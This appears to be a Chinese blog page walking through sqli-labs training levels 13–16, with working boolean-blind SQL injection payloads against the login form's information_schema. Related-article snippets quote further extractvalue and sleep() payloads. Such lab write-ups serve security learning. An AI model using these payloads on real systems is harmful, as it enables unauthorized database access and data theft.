Sqli-labs——lesson13-16

最新推荐文章于 2024-07-19 17:37:28 发布
最新推荐文章于 2024-07-19 17:37:28 发布
阅读量145 收藏
点赞数
分类专栏: Sqli-labs闯关 文章标签: java 服务器 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62281892/article/details/125633132
版权

这几关呢有很大的相似点,就是包裹方式的不同:

lesson13:('admin')

lesson14:''admin''

lesson15:'admin'

lesson16:("admin")

采用布尔盲注步骤:

1、先用or语句判断

最基础的先用or 1=1,记住参数admin一定要写错才能判断后面的。

然后在确定语法正确的条件上,用or +length来判断数据库名,用二分法得出其长度为8

 2、然后判断数据库名,结合burpsuit来爆破名字

uname=admin&passwd=ad' or left((select schema_name from information_schema.schemata limit 0,1),1)='u'#&Submit=Submit

3、判断表名

uname=admin&passwd=ad' or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='x'#&Submit=Submit

4、判断列名

uname=admin&passwd=ad' or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='x'#&Submit=Submit

Shock397
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs lesson1-4
weixin_43345082的博客
07-27 172
lesson1 首先输入id http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=1 之后加个单引号,会报错,应该是没闭合,字符型 http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=1’ http://127.0.0.1/SQl/sqli-labs-master/Less-1/?id=1’ and 1...
SQL注入学习 -- sqli-labs lesson 1
L1am3s
05-14 551
由于对SQL注入不太熟悉,所以就自己搭建了一个sqli-labs的平台.记录一下自己的学习过程首先我们要了解一下常规的数据库名字information_schema() ------  是mysql自带的数据库...
sqli-labs Lesson-1详细过程
Brad_的博客
10-15 629
sqli-labs Lesson-1 根据网上已有教程做得更细化了一些,希望大家共同学习,有错误还望指正。(个人OneNote复制过来为图片)
SQLi Labs Lesson13
1ame的博客
08-14 343
Lesson - 13 POST - Double Injection - Single Quotes - String with twist 首先进入欢迎界面。 构造如下表单,返回结果如图所示: 构造如下表单: 错误回显如图所示: 从新构造表单,闭合 ' ) 结果如图所示: 但是没有显示任何登录信息。
sqli-labs通关-------13lesson-post(单引号变形双注入)
枯藤闲画云
07-05 283
我们根据尝试发现有报错。以及数据应该是以单引号和括号闭合的。 尝试万能密码发现无效 然后通过bp抓包改包下面的都可以 uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and (' uname=admin') and extractvalue(1,concat(0x7e,(select dat...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs通关(十三)
qq_65950075的博客
05-03 601
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息。0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。作用:改变文档中符合条件的节点的值。
Sqlilabs-16
KAKA的博客
07-07 454
相较于第 15 关,单引号变成了双引号 + 括号 –查列 uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit –查用户名 uname=admin") and if(ascii(substr((select group_conca
Sqli-Labs Less1-16关详细讲解
大大大蜜蜂的博客
10-21 3493
information_schema数据库介绍: information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。information_schema是信息数据库,其中保存着关于mysql服务器所维护的所有其他数据库的信息。 下列为information_schema数据库中schemata表、tables表、columns表的介绍。 schemata表:提供了当前mysql实例中所有数据库的信息。 sche
SQLi LABS Less 16 布尔盲注
热门推荐
wangyuxiang946的博客
08-14 1万+
SQLi 第十六关,SQLi-LABS Less-16,SQLi-LABS Less 16,SQLiLABS Less16,SQLi Less 16
sqli-labs Lesson-2详细过程
Brad_的博客
10-16 533
sqli-labs-master第13、14关。
m_ing
05-13 1174
前言:输入内容被放到双引号中,报错型注入,注释符不可用 第十三关: http://192.168.89.134/sqli-labs-master/Less-13/ 先输入:admin’) 我们还是分析一下: 我们接着用and来测试。 admin’) and 1=2# -admin’) union selec 1,2#联合查询 还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue() 显示版本,数据库 admin’) and extractvalue(1,concat(0x7
Java内存模型
最新发布
weixin_44267758的博客
07-19 319
此处的变量不是指java编程中的变量,它包括了实例字段,静态字段和构成数值对象的元素,但不包括局部变量和方法参数。JMM规定所有变量都存储在主内存中。每条线程有自己的工作内存,工作内存中保留了该线程使用到变量的主内存的副本。线程对变量的所有操作都必须在工作内存中进行,不能直接读写主内存的变量,不同的线程间也无法直接访问对方工作内存的变量,线程之间的变量值传递需要通过主内存来完成。
JVM-垃圾回收与内存分配
m0_50846237的博客
07-19 597
JVM-垃圾回收与内存分配
day04:Redis和店铺营业状态设置
m0_69266818的博客
07-15 852
介绍了Redis命令和用java操作redis还有营业额状态接口的书写
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值